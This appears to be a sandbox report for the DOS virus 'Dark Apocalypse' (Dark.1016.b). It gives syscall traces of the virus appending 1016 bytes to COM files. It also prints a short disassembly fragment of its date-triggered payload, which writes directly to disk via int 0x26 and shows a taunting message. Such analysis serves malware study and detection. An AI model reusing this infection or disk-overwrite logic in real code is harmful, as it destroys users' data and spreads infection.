Sample viewer

vx.netlux.org/Virus.DOS.Dark.1016.b

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:09:53.085715152Z	42	PC: 12a73 \| Get date 0x12a73: cmp al, 1 0x12a75: jne 0x12a9f 0x12a77: cmp dl, 0x10 0x12a7a: jne 0x12a9f 0x12a7c: mov ah, 0x19 0x12a7e: int 0x21 0x12a80: lea bx, word ptr [bp + 0x3b7] 0x12a84: mov cx, 1 0x12a87: xor dx, dx 0x12a89: int 0x26 0x12a8b: jb 0x12a8e 0x12a8d: popf 0x12a8e: lea dx, word ptr [bp + 0x3e7] 0x12a92: mov ah, 9 0x12a94: int 0x21 0x12a96: int 5 0x12a98: xor ah, ah 0x12a9a: int 0x16 0x12a9c: jmp 0x12cf7 0x12a9f: lea si, word ptr [bp + 0x568]
2018-12-17T23:09:53.08931776Z	71	PC: 12aa9 \| Get current directory
2018-12-17T23:09:53.093175902Z	71	PC: 12ab3 \| Get current directory
2018-12-17T23:09:53.096461395Z	47	PC: 12b21 \| Get disk transfer address
2018-12-17T23:09:53.097831054Z	26	PC: 12b33 \| Set disk transfer address
2018-12-17T23:09:53.101558171Z	78	PC: 12b40 \| Find first file
2018-12-17T23:09:53.114028975Z	78	PC: 12c50 \| Find first file
2018-12-17T23:09:53.121145576Z	67	PC: 12c69 \| Get or set file attributes
2018-12-17T23:09:53.143276067Z	61	PC: 12c80 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T23:09:53.150820894Z	63	PC: 12c8d \| Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:09:53.158108291Z	66	PC: 12c44 \| Move file pointer
2018-12-17T23:09:53.161037683Z	63	PC: 12caf \| Read file or device (Read 15 bytes on handle 5)
2018-12-17T23:09:53.164517033Z	66	PC: 12cb8 \| Move file pointer
2018-12-17T23:09:53.166493356Z	64	PC: 12cce \| Write file or device (Write 1016 bytes on handle 5)
2018-12-17T23:09:53.176330133Z	66	PC: 12c44 \| Move file pointer
2018-12-17T23:09:53.17876869Z	64	PC: 12cdc \| Write file or device (Write 15 bytes on handle 5)
2018-12-17T23:09:53.186286671Z	62	PC: 12ce1 \| Close file
2018-12-17T23:09:53.206016577Z	67	PC: 12c3a \| Get or set file attributes
2018-12-17T23:09:53.212207086Z	79	PC: 12c59 \| Find next file
2018-12-17T23:09:53.215840104Z	67	PC: 12c69 \| Get or set file attributes
2018-12-17T23:09:53.222426614Z	61	PC: 12c80 \| Open file (Filename = 'PRINT.COM')
2018-12-17T23:09:53.228178847Z	63	PC: 12c8d \| Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:09:53.232568986Z	66	PC: 12c44 \| Move file pointer
2018-12-17T23:09:53.233888961Z	63	PC: 12caf \| Read file or device (Read 15 bytes on handle 5)
2018-12-17T23:09:53.237171124Z	66	PC: 12cb8 \| Move file pointer
2018-12-17T23:09:53.238381158Z	64	PC: 12cce \| Write file or device (Write 1016 bytes on handle 5)
2018-12-17T23:09:53.24393628Z	66	PC: 12c44 \| Move file pointer
2018-12-17T23:09:53.245781968Z	64	PC: 12cdc \| Write file or device (Write 15 bytes on handle 5)
2018-12-17T23:09:53.250431355Z	62	PC: 12ce1 \| Close file
2018-12-17T23:09:53.256115337Z	67	PC: 12c3a \| Get or set file attributes
2018-12-17T23:09:53.260580881Z	79	PC: 12c59 \| Find next file
2018-12-17T23:09:53.262992985Z	67	PC: 12c69 \| Get or set file attributes
2018-12-17T23:09:53.269824746Z	61	PC: 12c80 \| Open file (Filename = 'HELLO.COM')
2018-12-17T23:09:53.281654367Z	63	PC: 12c8d \| Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:09:53.28793046Z	66	PC: 12c44 \| Move file pointer
2018-12-17T23:09:53.289187466Z	63	PC: 12caf \| Read file or device (Read 15 bytes on handle 5)
2018-12-17T23:09:53.291441647Z	66	PC: 12cb8 \| Move file pointer
2018-12-17T23:09:53.293543219Z	64	PC: 12cce \| Write file or device (Write 1016 bytes on handle 5)
2018-12-17T23:09:53.299453657Z	66	PC: 12c44 \| Move file pointer
2018-12-17T23:09:53.301107998Z	64	PC: 12cdc \| Write file or device (Write 15 bytes on handle 5)
2018-12-17T23:09:53.30676621Z	62	PC: 12ce1 \| Close file
2018-12-17T23:09:53.314728517Z	67	PC: 12c3a \| Get or set file attributes
2018-12-17T23:09:53.326758433Z	26	PC: 12cf4 \| Set disk transfer address
2018-12-17T23:09:53.329353957Z	59	PC: 12ad1 \| Change current directory
2018-12-17T23:09:53.334096623Z	59	PC: 12add \| Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16672,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:53:36.06803745Z	42	PC: 12a73 \| Get date 0x12a73: cmp al, 1 0x12a75: jne 0x12a9f 0x12a77: cmp dl, 0x10 0x12a7a: jne 0x12a9f 0x12a7c: mov ah, 0x19 0x12a7e: int 0x21 0x12a80: lea bx, word ptr [bp + 0x3b7] 0x12a84: mov cx, 1 0x12a87: xor dx, dx 0x12a89: int 0x26 0x12a8b: jb 0x12a8e 0x12a8d: popf 0x12a8e: lea dx, word ptr [bp + 0x3e7] 0x12a92: mov ah, 9 0x12a94: int 0x21 0x12a96: int 5 0x12a98: xor ah, ah 0x12a9a: int 0x16 0x12a9c: jmp 0x12cf7 0x12a9f: lea si, word ptr [bp + 0x568]
2018-12-25T12:53:36.069984662Z	71	PC: 12aa9 \| Get current directory
2018-12-25T12:53:36.071907099Z	71	PC: 12ab3 \| Get current directory
2018-12-25T12:53:36.073675156Z	47	PC: 12b21 \| Get disk transfer address
2018-12-25T12:53:36.074918333Z	26	PC: 12b33 \| Set disk transfer address
2018-12-25T12:53:36.075739247Z	78	PC: 12b40 \| Find first file
2018-12-25T12:53:36.079280988Z	78	PC: 12c50 \| Find first file
2018-12-25T12:53:36.083817036Z	67	PC: 12c69 \| Get or set file attributes
2018-12-25T12:53:36.098620733Z	61	PC: 12c80 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:36.104419699Z	63	PC: 12c8d \| Read file or device (Read 2 bytes on handle 5)
2018-12-25T12:53:36.111713657Z	66	PC: 12c44 \| Move file pointer
2018-12-25T12:53:36.113997033Z	63	PC: 12caf \| Read file or device (Read 15 bytes on handle 5)
2018-12-25T12:53:36.116443232Z	66	PC: 12cb8 \| Move file pointer
2018-12-25T12:53:36.117865737Z	64	PC: 12cce \| Write file or device (Write 1016 bytes on handle 5)
2018-12-25T12:53:36.126734645Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.127994971Z	64	PC: 12cdc \| Write file or device (Write 15 bytes on handle 5)
2018-12-25T12:53:36.134299193Z	62	PC: 12ce1 \| Close file
2018-12-25T12:53:36.14288088Z	67	PC: 12c3a \| Get or set file attributes
2018-12-25T12:53:36.148167402Z	79	PC: 12c59 \| Find next file
2018-12-25T12:53:36.149901228Z	67	PC: 12c69 \| Get or set file attributes (See above)
2018-12-25T12:53:36.162567363Z	61	PC: 12c80 \| Open file (See above)
2018-12-25T12:53:36.169000924Z	63	PC: 12c8d \| Read file or device (See above)
2018-12-25T12:53:36.175172223Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.177373607Z	63	PC: 12caf \| Read file or device (See above)
2018-12-25T12:53:36.179813804Z	66	PC: 12cb8 \| Move file pointer (See above)
2018-12-25T12:53:36.181167396Z	64	PC: 12cce \| Write file or device (See above)
2018-12-25T12:53:36.189685502Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.190958006Z	64	PC: 12cdc \| Write file or device (See above)
2018-12-25T12:53:36.197261115Z	62	PC: 12ce1 \| Close file (See above)
2018-12-25T12:53:36.205317026Z	67	PC: 12c3a \| Get or set file attributes (See above)
2018-12-25T12:53:36.210568485Z	79	PC: 12c59 \| Find next file (See above)
2018-12-25T12:53:36.212923359Z	67	PC: 12c69 \| Get or set file attributes (See above)
2018-12-25T12:53:36.223200494Z	61	PC: 12c80 \| Open file (See above)
2018-12-25T12:53:36.229456733Z	63	PC: 12c8d \| Read file or device (See above)
2018-12-25T12:53:36.235688455Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.237116294Z	63	PC: 12caf \| Read file or device (See above)
2018-12-25T12:53:36.239574814Z	66	PC: 12cb8 \| Move file pointer (See above)
2018-12-25T12:53:36.240766825Z	64	PC: 12cce \| Write file or device (See above)
2018-12-25T12:53:36.248749691Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.250417333Z	64	PC: 12cdc \| Write file or device (See above)
2018-12-25T12:53:36.256734369Z	62	PC: 12ce1 \| Close file (See above)
2018-12-25T12:53:36.264682293Z	67	PC: 12c3a \| Get or set file attributes (See above)
2018-12-25T12:53:36.269286396Z	26	PC: 12cf4 \| Set disk transfer address
2018-12-25T12:53:36.270271087Z	59	PC: 12ad1 \| Change current directory
2018-12-25T12:53:36.285098044Z	59	PC: 12add \| Change current directory

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16672,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:53:36.086866784Z	42	PC: 12a73 \| Get date 0x12a73: cmp al, 1 0x12a75: jne 0x12a9f 0x12a77: cmp dl, 0x10 0x12a7a: jne 0x12a9f 0x12a7c: mov ah, 0x19 0x12a7e: int 0x21 0x12a80: lea bx, word ptr [bp + 0x3b7] 0x12a84: mov cx, 1 0x12a87: xor dx, dx 0x12a89: int 0x26 0x12a8b: jb 0x12a8e 0x12a8d: popf 0x12a8e: lea dx, word ptr [bp + 0x3e7] 0x12a92: mov ah, 9 0x12a94: int 0x21 0x12a96: int 5 0x12a98: xor ah, ah 0x12a9a: int 0x16 0x12a9c: jmp 0x12cf7 0x12a9f: lea si, word ptr [bp + 0x568]
2018-12-25T12:53:36.089643524Z	71	PC: 12aa9 \| Get current directory
2018-12-25T12:53:36.093109708Z	71	PC: 12ab3 \| Get current directory
2018-12-25T12:53:36.097022018Z	47	PC: 12b21 \| Get disk transfer address
2018-12-25T12:53:36.098482876Z	26	PC: 12b33 \| Set disk transfer address
2018-12-25T12:53:36.101690126Z	78	PC: 12b40 \| Find first file
2018-12-25T12:53:36.11356884Z	78	PC: 12c50 \| Find first file
2018-12-25T12:53:36.12094569Z	67	PC: 12c69 \| Get or set file attributes
2018-12-25T12:53:36.13762278Z	61	PC: 12c80 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:36.145086446Z	63	PC: 12c8d \| Read file or device (Read 2 bytes on handle 5)
2018-12-25T12:53:36.152609497Z	66	PC: 12c44 \| Move file pointer
2018-12-25T12:53:36.154505074Z	63	PC: 12caf \| Read file or device (Read 15 bytes on handle 5)
2018-12-25T12:53:36.157176277Z	66	PC: 12cb8 \| Move file pointer
2018-12-25T12:53:36.158558739Z	64	PC: 12cce \| Write file or device (Write 1016 bytes on handle 5)
2018-12-25T12:53:36.170250152Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.172372766Z	64	PC: 12cdc \| Write file or device (Write 15 bytes on handle 5)
2018-12-25T12:53:36.180908831Z	62	PC: 12ce1 \| Close file
2018-12-25T12:53:36.191444809Z	67	PC: 12c3a \| Get or set file attributes
2018-12-25T12:53:36.195347894Z	79	PC: 12c59 \| Find next file
2018-12-25T12:53:36.197283625Z	67	PC: 12c69 \| Get or set file attributes (See above)
2018-12-25T12:53:36.20457622Z	61	PC: 12c80 \| Open file (See above)
2018-12-25T12:53:36.212534629Z	63	PC: 12c8d \| Read file or device (See above)
2018-12-25T12:53:36.219984913Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.22182477Z	63	PC: 12caf \| Read file or device (See above)
2018-12-25T12:53:36.225378975Z	66	PC: 12cb8 \| Move file pointer (See above)
2018-12-25T12:53:36.22694812Z	64	PC: 12cce \| Write file or device (See above)
2018-12-25T12:53:36.23626256Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.242712411Z	64	PC: 12cdc \| Write file or device (See above)
2018-12-25T12:53:36.250566305Z	62	PC: 12ce1 \| Close file (See above)
2018-12-25T12:53:36.259632637Z	67	PC: 12c3a \| Get or set file attributes (See above)
2018-12-25T12:53:36.266468045Z	79	PC: 12c59 \| Find next file (See above)
2018-12-25T12:53:36.269369086Z	67	PC: 12c69 \| Get or set file attributes (See above)
2018-12-25T12:53:36.280195738Z	61	PC: 12c80 \| Open file (See above)
2018-12-25T12:53:36.288185278Z	63	PC: 12c8d \| Read file or device (See above)
2018-12-25T12:53:36.309044926Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.311108663Z	63	PC: 12caf \| Read file or device (See above)
2018-12-25T12:53:36.315585769Z	66	PC: 12cb8 \| Move file pointer (See above)
2018-12-25T12:53:36.317791086Z	64	PC: 12cce \| Write file or device (See above)
2018-12-25T12:53:36.323637509Z	66	PC: 12c44 \| Move file pointer (See above)
2018-12-25T12:53:36.324968112Z	64	PC: 12cdc \| Write file or device (See above)
2018-12-25T12:53:36.330112844Z	62	PC: 12ce1 \| Close file (See above)
2018-12-25T12:53:36.336295926Z	67	PC: 12c3a \| Get or set file attributes (See above)
2018-12-25T12:53:36.339914958Z	26	PC: 12cf4 \| Set disk transfer address
2018-12-25T12:53:36.341687342Z	59	PC: 12ad1 \| Change current directory
2018-12-25T12:53:36.344586669Z	59	PC: 12add \| Change current directory

{"DateBased":true,"Day":16,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16672,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:53:36.120165405Z	42	PC: 12a73 \| Get date 0x12a73: cmp al, 1 0x12a75: jne 0x12a9f 0x12a77: cmp dl, 0x10 0x12a7a: jne 0x12a9f 0x12a7c: mov ah, 0x19 0x12a7e: int 0x21 0x12a80: lea bx, word ptr [bp + 0x3b7] 0x12a84: mov cx, 1 0x12a87: xor dx, dx 0x12a89: int 0x26 0x12a8b: jb 0x12a8e 0x12a8d: popf 0x12a8e: lea dx, word ptr [bp + 0x3e7] 0x12a92: mov ah, 9 0x12a94: int 0x21 0x12a96: int 5 0x12a98: xor ah, ah 0x12a9a: int 0x16 0x12a9c: jmp 0x12cf7 0x12a9f: lea si, word ptr [bp + 0x568]
2018-12-25T12:53:36.122189379Z	25	PC: 12a80 \| Get default drive
2018-12-25T12:53:36.142041903Z	9	PC: 12a96 \| Display string (String= ' Welcome to the Dark Apocalypse... Your computer will never escape... You might as well read this and weep! The Dark Apocalypse v1.00 by Crypt Keeper [RoT] ��Reign of Terror�� [DARK APOCALYPSE] Press any key to continue...')